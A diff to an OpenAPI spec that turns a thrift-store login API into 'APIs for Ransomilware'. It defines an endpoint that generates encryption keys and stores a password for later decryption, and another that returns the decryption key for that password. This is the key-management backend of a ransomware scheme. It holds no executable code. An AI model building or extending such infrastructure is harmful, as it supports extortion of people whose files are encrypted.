# put_in_server/ransomil-api/storage/api-docs/api-docs.json
@@ -1,59 +1,32 @@
 {
     "openapi": "3.0.0",
     "info": {
-        "title": "APIs For Thrift Store",
+        "title": "APIs for Ransomilware",
         "version": "1.0.0"
     },
     "paths": {
-        "/login": {
-            "post": {
+        "/api/key": {
+            "get": {
                 "tags": [
-                    "auth"
+                    "generate Key - encrypting"
                 ],
-                "summary": "Sign in",
-                "description": "Login by email, password",
-                "operationId": "authLogin",
-                "requestBody": {
-                    "description": "Pass user credentials",
-                    "required": true,
-                    "content": {
-                        "application/json": {
-                            "schema": {
-                                "required": [
-                                    "email",
-                                    "password"
-                                ],
-                                "properties": {
-                                    "email": {
-                                        "type": "string",
-                                        "format": "email",
-                                        "example": "user1@mail.com"
-                                    },
-                                    "password": {
-                                        "type": "string",
-                                        "format": "password",
-                                        "example": "PassWord12345"
-                                    },
-                                    "persistent": {
-                                        "type": "boolean",
-                                        "example": "true"
-                                    }
-                                },
-                                "type": "object"
-                            }
-                        }
-                    }
-                },
+                "summary": "Generate Key and Password Key",
+                "description": "Response a generated Key, and store Password Key for future decryption use.",
+                "operationId": "generateKey",
                 "responses": {
-                    "422": {
-                        "description": "Wrong credentials response",
+                    "200": {
+                        "description": "Generated Encryption key",
                         "content": {
                             "application/json": {
                                 "schema": {
                                     "properties": {
-                                        "message": {
+                                        "id": {
                                             "type": "string",
-                                            "example": "Sorry, wrong email address or password. Please try again"
+                                            "example": "1"
+                                        },
+                                        "key": {
+                                            "type": "string",
+                                            "example": "key31$52"
                                         }
                                     },
                                     "type": "object"
@@ -64,55 +37,60 @@
                 }
             }
         },
-        "/testssss": {
-            "post": {
+        "/api/get/key": {
+            "get": {
                 "tags": [
-                    "asdadad"
+                    "retrive Key - decrypting"
                 ],
-                "summary": "Sign idsadn",
-                "description": "Login by email, password",
-                "operationId": "autd",
-                "requestBody": {
-                    "description": "Pass user credentials",
-                    "required": true,
-                    "content": {
-                        "application/json": {
-                            "schema": {
-                                "required": [
-                                    "email",
-                                    "password"
-                                ],
-                                "properties": {
-                                    "email": {
-                                        "type": "string",
-                                        "format": "email",
-                                        "example": "user1@mail.com"
-                                    },
-                                    "password": {
-                                        "type": "string",
-                                        "format": "password",
-                                        "example": "PassWord12345"
-                                    },
-                                    "persistent": {
-                                        "type": "boolean",
-                                        "example": "true"
-                                    }
-                                },
-                                "type": "object"
-                            }
+                "summary": "Get Key by Password",
+                "description": "Sent a password and response a decryption Key.",
+                "operationId": "retrieveKey",
+                "parameters": [
+                    {
+                        "name": "password",
+                        "in": "query",
+                        "description": "password use to retrieve the key",
+                        "required": false,
+                        "schema": {
+                            "type": "string",
+                            "format": "string"
                         }
                     }
-                },
+                ],
                 "responses": {
-                    "422": {
-                        "description": "Wrong credentials response",
+                    "200": {
+                        "description": "Get Encryption key",
                         "content": {
                             "application/json": {
                                 "schema": {
                                     "properties": {
-                                        "message": {
+                                        "id": {
                                             "type": "string",
-                                            "example": "Sorry, wrong email address or password. Please try again"
+                                            "example": "1"
+                                        },
+                                        "key": {
+                                            "type": "string",
+                                            "example": "key31$52"
+                                        },
+                                        "pass": {
+                                            "type": "string",
+                                            "example": "asdad3131sadasdada="
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "404": {
+                        "description": "No Matched Encryption key",
+                        "content": {
+                            "application/json": {
+                                "schema": {
+                                    "properties": {
+                                        "id": {
+                                            "type": "string",
+                                            "example": "not found!"
                                         }
                                     },
                                     "type": "object"
